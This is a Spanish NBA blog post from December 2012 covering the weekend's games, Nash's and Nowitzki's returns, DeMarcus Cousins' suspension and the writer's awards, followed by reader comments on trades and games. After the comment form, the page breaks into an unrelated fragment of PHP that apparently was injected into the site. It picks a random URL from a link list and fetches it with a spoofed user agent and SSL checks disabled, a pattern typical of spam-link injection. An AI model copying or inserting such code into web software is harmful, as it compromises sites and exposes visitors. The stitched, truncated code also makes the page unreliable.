Informe del fin de semana. Nash, Dirk in, Cousins out.

24 de December de 2012 por TheDeerHunter

Nos debatimos entre la satisfacción por la vuelta de Nash y Nowitzki a las canchas y la preocupación por la suspensión indefinida de Cousins en los Kings. Enésimo incidente de un jugador tan sobrado de talento como de personalidad problemática. La situación se desencadena, en esta ocasión, por un enfrentamiento entre el pívot y el técnico Keith Smart, quien para más inri se encuentra cada día más discutido por las maneras con las que está dirigiendo al equipo.

Repasamos el fin de semana por orden cronológico inverso. Ayer volvía Dirk de forma un tanto inesperada. Los 20 minutitos que disputó no sirvieron para evitar una humillación contra Spurs. Danny Green encabezó con sus 7 triples un brutal castigo desde el perímetro que terminó con un 20 de 30 desde la larga distancia y el partido roto en poco más de media parte. Los menos habituales no bajaron el pie del acelerador y la diferencia se cerró en 32 puntos.

La ausencia de Cousins no se notó en Sacramento y los Kings rompieron una buena racha de resultados de los Blazers. No fue talismán Claver, titular en esta ocasión, y Thornton, Salmons y Oultaw (para alucinar) se trasformaron en un tridente imparable.

Los Clippers obtuvieron su 13ª victoria consecutiva a costa de unos Suns entregados a la pegada de Paul&Griffin. Se estropeó un poco el Wolves@Knicks que teníamos a las 23h, por la baja de Love y el flojo partido de Ricky, pero Pekovic y Shved casi la lían. Melo y JR Smith no lo permitieron.

Antes vimos un interesante Sixers@Nets con actuaciones destacadas de Holiday por un lado y Joe Johnson por otro. Se lo terminaron llevando los locales. Terminando con la jornada del domingo, Utah doblegó a Orlando.

El sábado habíamos visto el regreso de Nash, decisivo en la victoria de los Lakers con prórroga en Oakland. Actuación polémica de Kobe y exhibición de Jarret Jack. Harden destrozó a los Grizzlies y una actuación superlativa de Robin Lopez no evitó la 11ª derrota consecutiva de los Hornets ante Indiana. Los Bobcats se comieron su 15ª consecutiva ante Denver. Waiters ayudó para romper la negativa de los Cavs.

Los Pistons, por su parte le endosaron un back to back a Washington; Atlanta ganó a Chicago; los campeones ganaron a Utah sin despeinarse y Blazers ganaron a Suns.

Finalmente el viernes Toronto logró su 5ª victoria consecutiva ante Orlando; Lee logró un triple doble a costa de los Bobcats; los Bucks tumbaron a los Celtics en la prórroga a pesar de Pierce y poco más destacable en una jornada más larga que interesante.

PREMIOS

MVP: Nos quedamos con Chris Paul, impecable en las dos victorias de Clippers durante el fin de semana. Imparables.

El rookie: Destacamos a Drummond en las dos victorias de Detroit ante Wizards.

La sorpresa: No está siendo un gran año de Marcus Thornton. John Salmons sí está a un muy buen nivel últimamente… pero lo que no esperábamos de ninguna de las maneras es que se les uniera Travis Outlaw.

La decepción: DeMarcus Cousins. Debe de existir alguna manera de reconducir su carrera.

El mayor esfuerzo en vano: Gran nivel de la dupla Okafor-Jordan Crawford en las dos derrotas que sufrieron ante Detroit.

Comenta

15 comentarios a esta entrada

  1. Txusma dice:
    #1

    Llamadme pesimista pero a mi lo de Demarcus Cousins me da muy mala espina. Es la 2ª vez que se pelea con su técnico y día a día demuestra que no está del todo bien de la cabeza. Tiene toda la pinta de ser el típico jugador al que su personalidad no dejará mostrar todo su potencial. Una verdadera lástima.

      Citar

  2. Ruxixón dice:
    #2

    ¿Acabará traspasado?La única solución es que lo meta en vereda un entrenador con galones en la NBA,un Doc Rivers o algo similar,dentro de una dinámica de equipo ganador.

      Citar

  3. Pikerton64 dice:
    #3

    A mí no me pareció para nada Melo MVP. Aún estoy llorando porque casi nos llevamos el partido, es más, hasta que los Wolves (Adelman) se quedaron sin ninguna jugada para los últimos 6 minutos, los Wolves lideraban con bastante seguridad. New York no metía un solo triple, y Pek estuvo inmenso en la primera mitad. Luego quisieron que no estuviera en la zona, empeñándose en bloqueos en media pista que nunca acabaron en pase interior, a no ser que el que la tuviera fuera el hombre del partido: Shved. J. R. se comió algunos tapones mientras mantenía a New York en el partido, y en eso llegó el último cuarto. No supieron que hacer con la bola, menos Barea que siempre sabe que hacer: tirársela aunque se haga un 4/14 FG. Eso ayudó bastante a que a Melo, desquiciado durante los tres primeros cuartos, le diera tiempo de entrar en el partido gracias a un triple. A partir de ahí solo fue capaz de meter tiros libres, ¿clutchness? Para mí no, aunque fueran como 4 ó 5 series casi perfectas.
    La clave sin duda fue una posesión, a falta quizás de 3~2 minutos en la que los Wolves atacaron unas 4 veces seguidas, por rebotes ofensivos o por fueras o faltas de Kniks. Tras todos estos ataques y diría que unos 6-7 tiros fallidos a canasta, el equipo de casa remontó.

    Es una verdadera lástima, hubiera sido precioso ganarle a OKC y Kniks in a row, sobre todo teniendo en cuenta que fuimos 10 por delante gran parte del partido (el 2° y el 3° cuarto). La baja de Love se notó en las posesiones finales, aunque al nivel que está jugando… Ricky también se echó en falta, y eso que ayer hizo su 2° mejor partido de esta temporada, o sea que… Y lo de Shved un escándalo. La Este-connection es brutal. AK y él se compenetran genial, pero si añadimos que también se entiende muy bien con Pek…

      Citar

  4. melo15 dice:
    #4

    Hombre Pikerton, decir que Melo solo metio tiros libre es mentir a lo bestia, es verdad que hasta el 4 cuarto Melo estaba haciendo un partido nefasto y estaba perdiendo el control tirando incluso demasiado, pero en los ultimos minutos Melo anoto un triple para poner a los Knicks uno abajo y despues un 2+1 para poner a los Knicks arriba.
    Fue despues cuando tiro 6 tiros libre metiendolos todos, aunque tambien tiene su merito pues no todos los jugadores son capaces de encertarlos en el clutchtime.

    Creeis que los Kings traspasaran a Cousins? Donde creeis que lo pueden traspasar?
    Yo creo que casi todos los equipos tendrian que estar interesados en Cousisns no creeis?

      Citar

  5. Denise dice:
    #5

    melo15:

    Creeis que los Kings traspasaran a Cousins? Donde creeis que lo pueden traspasar?
    Yo creo que casi todos los equipos tendrian que estar interesados en Cousisns no creeis?

    A Chicago junto con el contratito de Salmons por Boozer

    Un equipo al que le haría falta un jugador como Cousins y donde éste podría ser educado, serían los Celtics..pero no creo que los verdes tengan jugadores que a los Kings les interesen, un trade Bass por Cousins a pelo me olería a estafa hacia los KIngs por mucho que Cousins no tenga cabeza.

      Citar

  6. Denise dice:
    #6

    A alguien mas le parece muy fea la pista de los Brooklyn Nets. Me recuerda a la del Bilbao Basket, tambien muy fea para mi. Ademas no sé por qué pero me da la impresión optica como que la cancha de los Nets fuese menos ancha que la de los demas, tengo la sensación de un apelotonamiento de jugadores.

    Las pistas mas bonitas para mi tal y como se ven por la TV, las de Knicks, Magic, Wolves, Suns y Celtics.

    A todo esto…los Celtics dandole una paliza a los Nets con Sullinger de invitado sorpresa.

      Citar

  7. Pop dice:
    #7

    Denise:
    A alguien mas le parece muy fea la pista de los Brooklyn Nets. Me recuerda a la del Bilbao Basket, tambien muy fea para mi. Ademas no sé por qué pero me da la impresión optica como que la cancha de los Netsfuese menos ancha que la de los demas, tengo la sensación de un apelotonamiento de jugadores.

    Las pistas mas bonitas para mi tal y como se ven por la TV, las de Knicks, Magic, Wolves, Suns y Celtics.

    A todo esto…los Celtics dandole una paliza a los Nets con Sullinger de invitado sorpresa.

    Para feas las equipaciones estas monocolor de Navidad.

      Citar

  8. simon dice:
    #8

    Primer cuarto al trán trán de los Lakers aunque está el partido igualado… siguen siendo demasiado individualistas… no me gustan.

      Citar

  9. simon dice:
    #9

    uffff menudo susto nos acaba de dar Melo.

      Citar

  10. Pop dice:
    #10

    Nikola Loncar criticando que MWP no cometa falta para frenar a Carmelo aunque esta le suponga la 4ª falta al empezar el tercer cuarto. Egoista y poco ganador, le está llamando. Estoy a punto de potar las gambas de anoche. Si Daimiel no fuera un tío tan tranquilo le pegaba una colleja.

      Citar

  11. melo15 dice:
    #11

    Denise ese traspaso es un timo pero muy grande, Boozer esta haciendo una buena temporada pero le quedan pocos años y el contrato de Salmons no compensa. Yo creo que a los Kings solo los compensaria un traspaso por un pivot, creo que Noah podria ser un gran candidato y les daria un punto de competividad que necesitan.
    Creo que es dificil conseguir un jugador con el que traspasar a Cousins, porque este es bueno, contrato bajo, joven y encima pivot que estan escasos.

      Citar

  12. Sempren dice:
    #12

    Y con una tara importante en su cabecita, por lo que todavía será más difícil encontrar un buen traspaso: unos verán al crack que hay en él, y otros al desequilibrado, por lo que un Noah sería un buen precio para los primeros, pero un riesgo enorme para los segundos

      Citar

  13. melo15 dice:
    #13

    Yo no creo que Cousins sea un problema, ademas creo que con un entrenador adecuado que le ponga las cosas claras podria ser brutal, un tio de 2.10 con habilidades exteriores super desarroladas y que si se centra podria llegar muy alto, y ademas como mucho el traspaso te sale mal y se queda en lo que es un pivot que te hace un 17-11 con la gorra.

      Citar

  14. simon dice:
    #14

    Nash mandando por encima de Kobe en estos ultimos dos minutos… seguro que Bryant no estará muy contento y mas si acaban palmando.

      Citar

  15. Pop dice:
    #15

    Y Gasol poniendo la puntilla con una de esas jugadas que echaba de menos en él. Buen partido de él y de Nash, y Howard ha estado muy bien en defensa. Kobe a su bola, pero machacando con 34 puntazos. Metta también se ha portado.

    Por parte de NY el problema es que ha sido Carmelo y JR contra el mundo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>